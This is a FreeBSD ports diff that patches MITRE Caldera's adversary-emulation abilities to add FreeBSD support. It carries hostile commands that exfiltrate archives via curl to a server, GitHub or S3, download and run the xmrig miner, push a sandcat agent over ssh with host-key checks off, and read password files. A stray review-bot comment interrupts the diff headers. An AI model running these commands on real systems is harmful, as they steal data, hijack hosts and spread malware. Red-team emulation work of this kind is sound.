index 000000000000..0c923801e46a
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml
@@ -0,0 +1,13 @@
+--- plugins/stockpile/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml
+@@ -16,6 +16,10 @@
+ sh:
+ command: |
+ python3 --version;python2 --version;python --version
++ freebsd:
++ sh:
++ command: |
++ pkg version -x python3 | cut -d '-' -f2 | awk '{print $1}' && pkg version -x python2 | cut -d '-' -f2 | awk '{print $1}'
+ windows:
+ cmd:
+ command: |
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_b6f545ef-f802-4537-b59d-2cb19831c8ed.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_b6f545ef-f802-4537-b59d-2cb19831c8ed.yml
new file mode 100644
index 000000000000..0f35c6455ab4
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_b6f545ef-f802-4537-b59d-2cb19831c8ed.yml
@@ -0,0 +1,13 @@
+--- plugins/stockpile/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml
+@@ -8,7 +8,7 @@
+ attack_id: T1016
+ name: System Network Configuration Discovery
+ platforms:
+- darwin:
++ darwin,freebsd:
+ sh:
+ command: |
+- ifconfig | grep broadcast
+\ No newline at end of file
++ ifconfig | grep broadcast
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_bd527b63-9f9e-46e0-9816-b8434d2b8989.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_bd527b63-9f9e-46e0-9816-b8434d2b8989.yml
new file mode 100644
index 000000000000..bd45cfbb221f
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_bd527b63-9f9e-46e0-9816-b8434d2b8989.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml
+@@ -12,7 +12,7 @@
+ sh:
+ command: |
+ whoami
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ whoami
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_c0da588f-79f0-4263-8998-7496b1a40596.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_c0da588f-79f0-4263-8998-7496b1a40596.yml
new file mode 100644
index 000000000000..01803f22087a
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_c0da588f-79f0-4263-8998-7496b1a40596.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml
+@@ -15,7 +15,7 @@
+ plugins.stockpile.app.parsers.basic:
+ - source: host.user.name
+ - source: domain.user.name
+- linux:
++ freebsd,linux:
+ sh:
+ command: whoami
+ parsers:
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml
new file mode 100644
index 000000000000..bd9b22860d08
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml
+@@ -15,7 +15,7 @@
+ parsers:
+ plugins.stockpile.app.parsers.basic:
+ - source: host.user.name
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_ce485320-41a4-42e8-a510-f5a8fe96a644.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_ce485320-41a4-42e8-a510-f5a8fe96a644.yml
new file mode 100644
index 000000000000..7e128a92b5ad
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_ce485320-41a4-42e8-a510-f5a8fe96a644.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml
+@@ -8,7 +8,7 @@
+ attack_id: T1018
+ name: Remote System Discovery
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: host "#{target.org.domain}" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev
+ parsers:
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml
new file mode 100644
index 000000000000..4dbd92f81fad
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml
+@@ -12,7 +12,7 @@
+ sh:
+ command: |
+ sudo ifconfig
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ sudo ifconfig
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml
new file mode 100644
index 000000000000..deff7f08eed2
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml
@@ -0,0 +1,20 @@
+--- plugins/stockpile/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml
+@@ -12,6 +12,10 @@
+ sh:
+ command: |
+ pwpolicy getaccountpolicies
++ freebsd:
++ sh:
++ command: |
++ cat /etc/pam.d/passwd
+ linux:
+ sh:
+ command: |
+@@ -19,4 +23,4 @@
+ windows:
+ psh:
+ command: |
+- net accounts
+\ No newline at end of file
++ net accounts
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_fa6e8607-e0b1-425d-8924-9b894da5a002.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_fa6e8607-e0b1-425d-8924-9b894da5a002.yml
new file mode 100644
index 000000000000..15613cb57462
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_fa6e8607-e0b1-425d-8924-9b894da5a002.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml
+@@ -15,7 +15,7 @@
+ parsers:
+ plugins.stockpile.app.parsers.basic:
+ - source: host.current.time
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ date -u +"%Y-%m-%dT%H:%M:%SZ"
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_execution_b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_execution_b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml
new file mode 100644
index 000000000000..336bdd598724
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_execution_b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml
+@@ -14,7 +14,7 @@
+ pkill -f sandcat
+ payloads:
+ - sandcat.go
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ nohup ./sandcat.go -server #{server} &
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_0582dc26-e0cf-4645-88cf-f37a02279976.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_0582dc26-e0cf-4645-88cf-f37a02279976.yml
new file mode 100644
index 000000000000..005748e3ee73
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_0582dc26-e0cf-4645-88cf-f37a02279976.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml
+@@ -10,7 +10,7 @@
+ attack_id: T1567.001
+ name: Exfiltration to Code Repository
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: | # Temporary file needed to avoid curl length restrictions
+ GHUser="#{github.user.name}";
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_110cea7a-5b03-4443-92ee-7ccefaead451.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_110cea7a-5b03-4443-92ee-7ccefaead451.yml
new file mode 100644
index 000000000000..0b273cc3e81e
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_110cea7a-5b03-4443-92ee-7ccefaead451.yml
@@ -0,0 +1,18 @@
+--- plugins/stockpile/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml
+@@ -6,7 +6,7 @@
+ attack_id: T1029
+ name: Scheduled Transfer
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ crontab -l > /tmp/origcron;
+@@ -46,4 +46,4 @@
+
+ Register-ScheduledTask -TaskName "Scheduled exfiltration" -Trigger $trigger -Action $action;
+ cleanup: |
+- Unregister-ScheduledTask -TaskName "Scheduled exfiltration" -Confirm:$false;
+\ No newline at end of file
++ Unregister-ScheduledTask -TaskName "Scheduled exfiltration" -Confirm:$false;
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_2f90d4de-2612-4468-9251-b220e3727452.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_2f90d4de-2612-4468-9251-b220e3727452.yml
new file mode 100644
index 000000000000..7314e2e0e6ab
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_2f90d4de-2612-4468-9251-b220e3727452.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml
+@@ -6,7 +6,7 @@
+ attack_id: T1560.001
+ name: 'Archive Collected Data: Archive via Utility'
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ tar -czf #{host.dir.git}.tar.gz -C "#{host.dir.git}" .; printf #{host.dir.git}.tar.gz;
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_300157e5-f4ad-4569-b533-9d1fa0e74d74.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_300157e5-f4ad-4569-b533-9d1fa0e74d74.yml
new file mode 100644
index 000000000000..69160b87e16a
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_300157e5-f4ad-4569-b533-9d1fa0e74d74.yml
@@ -0,0 +1,18 @@
+--- plugins/stockpile/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml
+@@ -17,7 +17,7 @@
+ parsers:
+ plugins.stockpile.app.parsers.basic:
+ - source: host.dir.compress
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ tar -P -zcf #{host.dir.staged}.tar.gz #{host.dir.staged} && echo #{host.dir.staged}.tar.gz
+@@ -38,4 +38,4 @@
+ - source: host.dir.compress
+ requirements:
+ - plugins.stockpile.app.requirements.paw_provenance:
+- - source: host.dir.staged
+\ No newline at end of file
++ - source: host.dir.staged
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml
new file mode 100644
index 000000000000..c9f92c4ed759
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml
@@ -0,0 +1,18 @@
+--- plugins/stockpile/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml
+@@ -43,7 +43,7 @@
+ $result = $sr.ReadToEnd();
+ $result;
+ $res.close();
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ LocalFile='#{host.dir.compress}';
+@@ -55,4 +55,4 @@
+ --data-binary @#{host.dir.compress}
+ requirements:
+ - plugins.stockpile.app.requirements.paw_provenance:
+- - source: host.dir.compress
+\ No newline at end of file
++ - source: host.dir.compress
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_4a1120a5-971c-457f-bb07-60641b4723fd.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_4a1120a5-971c-457f-bb07-60641b4723fd.yml
new file mode 100644
index 000000000000..28fa5c84164e
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_4a1120a5-971c-457f-bb07-60641b4723fd.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml
+@@ -6,7 +6,7 @@
+ attack_id: T1567.001
+ name: Exfiltration to Code Repository
+ platforms:
+- linux: # https://docs.github.com/en/rest/reference/repos#contents
++ freebsd,linux: # https://docs.github.com/en/rest/reference/repos#contents
+ sh:
+ command: |
+ GHUser="#{github.user.name}";
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_5c5b0392-1daa-45e1-967c-2f361ce78849.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_5c5b0392-1daa-45e1-967c-2f361ce78849.yml
new file mode 100644
index 000000000000..26fd685ed8fc
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_5c5b0392-1daa-45e1-967c-2f361ce78849.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml
+@@ -11,7 +11,7 @@
+ attack_id: T1030
+ name: Data Transfer Size Limits
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase '#{host.archive.password}' > #{host.dir.staged}.tar.gz.gpg;
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_a201bec2-a193-4b58-bf0e-57fa621da474.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_a201bec2-a193-4b58-bf0e-57fa621da474.yml
new file mode 100644
index 000000000000..d31c5b4033ef
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_a201bec2-a193-4b58-bf0e-57fa621da474.yml
@@ -0,0 +1,18 @@
+--- plugins/stockpile/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml
+@@ -7,7 +7,7 @@
+ attack_id: T1567.001
+ name: Exfiltration to Code Repository
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ GHUser="#{github.user.name}";
+@@ -62,4 +62,4 @@
+ };
+ requirements:
+ - plugins.stockpile.app.requirements.paw_provenance:
+- - source: host.dir.staged
+\ No newline at end of file
++ - source: host.dir.staged
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_ba0deadb-97ac-4a4c-aa81-21912fc90980.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_ba0deadb-97ac-4a4c-aa81-21912fc90980.yml
new file mode 100644
index 000000000000..5fc9da37edc5
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_ba0deadb-97ac-4a4c-aa81-21912fc90980.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml
+@@ -9,7 +9,7 @@
+ attack_id: T1537
+ name: 'Transfer Data to Cloud Account'
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ LocalFile='#{host.dir.compress}';
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_d754878c-17dd-46dc-891c-a993f8a10336.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_d754878c-17dd-46dc-891c-a993f8a10336.yml
new file mode 100644
index 000000000000..53bbfc44e9e4
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_d754878c-17dd-46dc-891c-a993f8a10336.yml
@@ -0,0 +1,18 @@
+--- plugins/stockpile/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml
+@@ -8,7 +8,7 @@
+ attack_id: T1048.003
+ name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ LocalFile='#{host.dir.compress}';
+@@ -35,4 +35,4 @@
+ $requestStream.Dispose();
+ requirements:
+ - plugins.stockpile.app.requirements.paw_provenance:
+- - source: host.dir.compress
+\ No newline at end of file
++ - source: host.dir.compress
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml
new file mode 100644
index 000000000000..36cfe29cab10
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml
@@ -0,0 +1,18 @@
+--- plugins/stockpile/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml
+@@ -8,7 +8,7 @@
+ attack_id: T1567.002
+ name: 'Exfiltration to Cloud Storage'
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ LocalFile='#{host.dir.compress}';
+@@ -30,4 +30,4 @@
+ aws s3 rm s3://#{s3.source.name}/$RemoteName;
+ requirements:
+ - plugins.stockpile.app.requirements.paw_provenance:
+- - source: host.dir.compress
+\ No newline at end of file
++ - source: host.dir.compress
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml
new file mode 100644
index 000000000000..0035807bbc2d
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_exfiltration_ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml
+@@ -12,7 +12,7 @@
+ sh:
+ command: |
+ curl -F "data=@#{host.dir.compress}" --header "X-Request-ID: `hostname`-#{paw}" #{server}/file/upload
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ curl -F "data=@#{host.dir.compress}" --header "X-Request-ID: `hostname`-#{paw}" #{server}/file/upload
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_46da2385-cf37-49cb-ba4b-a739c7a19de4.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_46da2385-cf37-49cb-ba4b-a739c7a19de4.yml
new file mode 100644
index 000000000000..e01052cff30e
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_46da2385-cf37-49cb-ba4b-a739c7a19de4.yml
@@ -0,0 +1,22 @@
+--- plugins/stockpile/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml
+@@ -19,6 +19,19 @@
+ cleanup: |
+ rm -rf ./xmrig*;
+ timeout: 120
++ freebsd:
++ sh:
++ # FreeBSD should include `timeout` making this easy.
++ # We expect timeout to return a 124, which needs to then return a 0
++ # to make Caldera UI happy.
++ command: |
++ wget https://github.com/xmrig/xmrig/releases/download/v6.19.2/xmrig-6.19.2-freebsd-static-x64.tar.gz;
++ tar -xf xmrig-6.19.2-freebsd-static-x64.tar.gz;
++ timeout 60 ./xmrig-6.19.2/xmrig;
++ [ $? -eq 124 ]
++ cleanup: |
++ rm -rf ./xmrig*;
++ timeout: 120
+ darwin:
+ sh:
+ # MacOS does not include timeout, but can mimic the process with screen.
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml
new file mode 100644
index 000000000000..b5ef72e367f9
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml
+@@ -12,7 +12,7 @@
+ sh:
+ command: |
+ echo "proof that this machine was hacked." > message.txt
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ echo "proof that this machine was hacked." > message.txt
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_55f9600a-756f-496b-b27f-682052dc429c.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_55f9600a-756f-496b-b27f-682052dc429c.yml
new file mode 100644
index 000000000000..89f970a49053
--- /dev/null
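Review bot: The added `freebsd` executor in impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml extracts and runs a downloaded release archive without checking its digest, so the host under test executes whatever that URL serves at run time. Compare the archive with a pinned digest before `tar -xf`, for example `sha256 -q -c <expected-sha256-placeholder> xmrig-6.19.2-freebsd-static-x64.tar.gz || exit 1;`, with the placeholder filled in from the release being pinned. The steps are joined with `;`, so a failed download still reaches `tar` and `timeout`, and the result is then reported only by the final `[ $? -eq 124 ]` test. `wget` is not part of the FreeBSD base system either, so a comment next to the existing `timeout` remark should state that prerequisite.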
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_impact_55f9600a-756f-496b-b27f-682052dc429c.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml
+@@ -7,7 +7,7 @@
+ command: ./mission.go -duration 60 -extension .caldera -dir '/'
+ payloads:
+ - mission.go
+- linux:
++ freebsd,linux:
+ sh:
+ command: ./mission.go -duration 60 -extension .caldera -dir '/'
+ payloads:
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_lateral-movement_10a9d979-e342-418a-a9b0-002c483e0fa6.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_lateral-movement_10a9d979-e342-418a-a9b0-002c483e0fa6.yml
new file mode 100644
index 000000000000..1016cc6fb5c5
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_lateral-movement_10a9d979-e342-418a-a9b0-002c483e0fa6.yml
@@ -0,0 +1,16 @@
+--- plugins/stockpile/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml
+@@ -24,4 +24,13 @@
+ ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'
+ payloads:
+ - sandcat.go-linux
++ freebsd:
++ sh:
++ command: |
++ scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-freebsd #{remote.ssh.cmd}:~/sandcat.go &&
++ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'
++ cleanup: |
++ ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'
++ payloads:
++ - sandcat.go-freebsd
+ singleton: True
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_lateral-movement_4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_lateral-movement_4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml
new file mode 100644
index 000000000000..a396438d78ed
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_lateral-movement_4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml
@@ -0,0 +1,15 @@
+--- plugins/stockpile/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml
+@@ -54,4 +54,12 @@
+ ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'rm -f sandcat.go'
+ payloads:
+ - sandcat.go-linux
++ freebsd:
++ sh:
++ command: |
++ scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-freebsd #{remote.ssh.cmd}:~/sandcat.go
++ cleanup: |
++ ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'rm -f sandcat.go'
++ payloads:
++ - sandcat.go-freebsd
+ singleton: True
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_privilege-escalation_10681f2f-be03-44af-858d-f2b0812df185.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_privilege-escalation_10681f2f-be03-44af-858d-f2b0812df185.yml
new file mode 100644
index 000000000000..85d98fa7d6c4
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_privilege-escalation_10681f2f-be03-44af-858d-f2b0812df185.yml
@@ -0,0 +1,12 @@
